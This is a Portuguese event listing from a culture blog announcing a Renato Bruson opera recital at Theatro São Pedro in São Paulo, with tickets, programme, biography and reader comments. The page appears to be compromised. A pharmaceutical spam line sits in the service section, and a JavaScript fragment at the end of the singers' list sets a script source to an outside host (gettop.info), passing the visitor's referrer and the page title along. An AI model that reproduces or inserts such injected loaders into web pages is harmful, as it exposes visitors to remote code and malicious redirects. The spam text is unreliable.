LateralProgramaçãoSão Paulo

Renato Bruson no Projeto Grandes Vozes

Trazemos o grande barítono italiano Renato Bruson, um dos mais importantes barítonos internacionais, no Theatro São Pedro, em São Paulo.

SERVIÇO

 
cialis tutti i derivati

Theatro São Pedro
Rua Barra Funda, 171 – Barra Funda – SP
Tel.: 11 3667-0499

Dia 27 de abril, sexta-feira, às 20h30

Ingressos a R$ 20,00 e meia-entrada

Os ingressos poderão ser retirados antecipadamente na bilheteria até uma hora antes do espetáculo

Horário da bilheteria: De quarta a domingo – Das 14h às 19h ou até o início do espetáculo

Ingresso Rápido – http://www.ingressorapido.com.br/evento.aspx?ID=20339

Meia Entrada: alunos de ensino fundamental, médio e superior, professores da rede estadual de ensino, cidadãos com 60 anos ou mais, alunos de cursinho pré-vestibular e de cursos técnicos de São Paulo, mediante apresentação de documento comprobatório na entrada para o espetáculo.

 

 

O pianista é Anderson Brenner. No repertório, trechos de óperas de Verdi, Puccini, Tosti, Ponchielli e Cilea. Participam do recital Mere Oliveira (Mezzo-soprano), Rinaldo Leone (Tenor) e Tati Helene (Soprano). O recital integra o Momento Itália Brasil. Realização: Governo do Estado de São Paulo e Secretaria da Cultura, através do Instituto Pensarte. Apoio: Consulado Geral da Itália, Instituto Italiano di Cultura de São Paulo e Instituto Europeu de Design.
Renato Bruson realizará três master-classes no Theatro São Pedro, nos dias 24, 25 e 26 de abril, das 15h às 19h. Há vagas para ouvintes. Grátis!

 

PROGRAMA
F. P. Tosti (1846-1916)
L´ultima canzone
A vucchella
– Solista: RENATO BRUSON

A. Ponchielli (1834-1886)
Stella del marinar da ópera La Gioconda
– Solista: Mere Oliveira

G. Puccini ( 1858-1924)
E lucevan le stelle da ópera Tosca
– Solista: Rinaldo Leone

Senza mamma da ópera Suor Angélica
– Solista: Tati Helene

G. Verdi ( 1813-1901)
Reverenza…buon giorno, buona donna… Alice è mia da ópera Falstaff
– Solistas: RENATO BRUSON e Mere Oliveira

Madamigella Valery….pura siccome un angelo…siate felice da ópera La Traviata
– Solistas: RENATO BRUSON e Tati Helene

Parmi veder le lagrime da ópera Rigoletto
– Solista: Rinaldo Leone

A. Boito (1842-1918)
L`altra notte in fondo al mare da ópera Mefistofele
– Solista: Tati Helene

G. Puccini
Ah Mimi tu più non torni da ópera La Bohème
– Solistas: RENATO BRUSON e Rinaldo Leone

F. Cilea (1866-1950)
Acerba voluttà da ópera Adriana Lecouvreur
– Solista: Mere Oliveira

G. Verdi
Di Provenza il mare, il suol da ópera La Traviata
– Solista: RENATO BRUSON

 

Renato Bruson

Renato Bruson

O barítono vêneto Renato Bruson estreou profissionalmente em 1961, em Il Trovatore. No ano seguinte, fez sua estreia em Roma, em I Puritani. Os primeiros anos de sua carreira foram inteiramente dedicados a concertos e recitais. Em 1968,  estreou triunfantemente, no Metropolitan Opera de Nova York, numa montagem brilhante de Lucia di Lammermoor.

Ganhou notoriedade internacional como um dos grandes intérpretes de Verdi e Donizetti, em montagens de Otello, Un Ballo in Maschera, La Forza del Destino, Macbeth, Simon Boccanegra, Don Carlo, La Traviata, Rigoletto, Nabucco, Lucia di Lammermoor, Belisário, Poliuto, La Favorita, Andrea Chénier e Don Giovanni, entre outras.

Na década de 1980, voltou a se apresentar em recitais, obtendo grande sucesso em Londres, Viena e Paris. São inúmeras suas participações em óperas lançadas em Discos, DVDs, CDs, em títulos como Don Carlo, Macbeth, Falstaff, Cavalleria Rusticana e Rigoletto. Sua discografia é imensa, com destaque para as gravações de Macbeth e Rigoletto, o que o tornou um daqueles raros exímios artistas a alcançar grande popularidade. Vencedor de um Grammy, teve seu enorme talento reconhecido também com um Prêmio da Academia Japonesa, o Orfeu de Ouro da Academia Internacional do Disco Lírico, Cavaleiro da Ordem de Malta e o cobiçado Kammersanger da ópera de Viena.

Renato Bruson se apresentou em todos os grandes teatros italianos como Scala de Milão, Regio de Parma, San Carlo de Nápoles, Regio de Torino, La Fenice de Veneza, Ópera de Roma, Palermo, Catania, Carlo Felice de Gênova e nas principais casas de ópera do mundo como Viena, Zurique, Berlim, Buenos Aires, Barcelona, Madri, Ópera de Paris, Metropolitan de Nova York, São Francisco, Los Angeles, Tóquio.

Atuou ao lado dos mais célebres colegas como Montserrat Caballé, Kátia Ricciarelli, Mara Zampieri, Luciano Pavarotti, Plácido Domingo, José Carreras, Jaime Aragall, Alfredo Kraus, Fiorenza Cossotto, Elena Obraztsova e das brasileiras Eliane Coelho e Martha Herr, sob as mais ilustres regências como Abbado, Von Karajan, Kleiber, Bernstein, Levine, Maazel, Giulini, Mehta, Mackerras, Conlon, Gavazzeni, Sinopoli , Muti e Oren.

É casado com a prestigiosa cenógrafa e figurinista Tita Tegano que idealizou muitos de seus figurinos. Seu nome figura como um dos principais cantores de ópera de sua geração, um marco na história da discografia e do teatro de ópera internacional. Atua ainda em produções de ópera como protagonista e diretor de cena, além de ministrar máster classes em vários países da Europa, Estados Unidos e Ásia.

 

Renato Bruson  em São Paulo

1976 – La Traviata – 03 récitas no Theatro Municipal
1978 – Simon Boccanegra – 03 récitas no Theatro Municipal
1989    Recital de Gala – 02 apresentações no Auditório Elis Regina
1996 – Falstaff – 03 récitas no Theatro Municipal
1997 – Otello – 03 récitas no Theatro Municipal
2001 – La Traviata – 04 récitas no Theatro Municipal
Vídeo no Youtube:

Renato Bruson “Cortigiani, vil razza dannata” Rigoletto – http://youtu.be/6o2rUGWX9wE

Renato Bruson “O Carlo ascolta” Don Carlo – http://youtu.be/G6HrSVpd9eE

Renato Bruson en Don Giovanni – http://youtu.be/8GkME-LkUjc

Renato Bruson – Verdi – Nabucco – “Dio di Giuda!” – M. Arena – 1981 – http://youtu.be/wbwfnL1DWqg

 

Nesses 7 anos, o Projeto Grandes Vozes trouxe ao Brasil nomes como Bruna Baglioni, Bruno Praticò, Fiorenza Cossotto, Giovanna Casolla, Mara Zampieri e Maria Pia Piscitelli (Itália), Juan Pons, Maria Bayo, Mariola Cantarero  e Jaime Aragall (Espanha), Elena Obraztsova e Yevgeny Nesterenko (Rússia), Niza de Castro Tank (Brasil), Nancy Fabiola Herrera (Venezuela) e Rita Contino (Uruguai).s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

2 Comments

  1. Esse cara nao canta mais nada! eu ouvi um concerto na Itália no ano passado e era horrivel! Aposto que amanha os críticos estarao lá puxando o “Sapato” desse coroa e escrevendo maravilhas e nós que consumimos “porcarias” internacionais e menosprezamos a nossa, estaremos ali batendo palmas em glória!
    A C O R D A B R A S I L!!!!!
    Nós temos coisas mehores e não valorizamos!

  2. Só se forem os cantores do passado …. Hoje, no Brasil, não existe mais ninguém que sabe cantar ou que sabe ensinar a cantar.
    Só charlatães.

Leave a Response

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.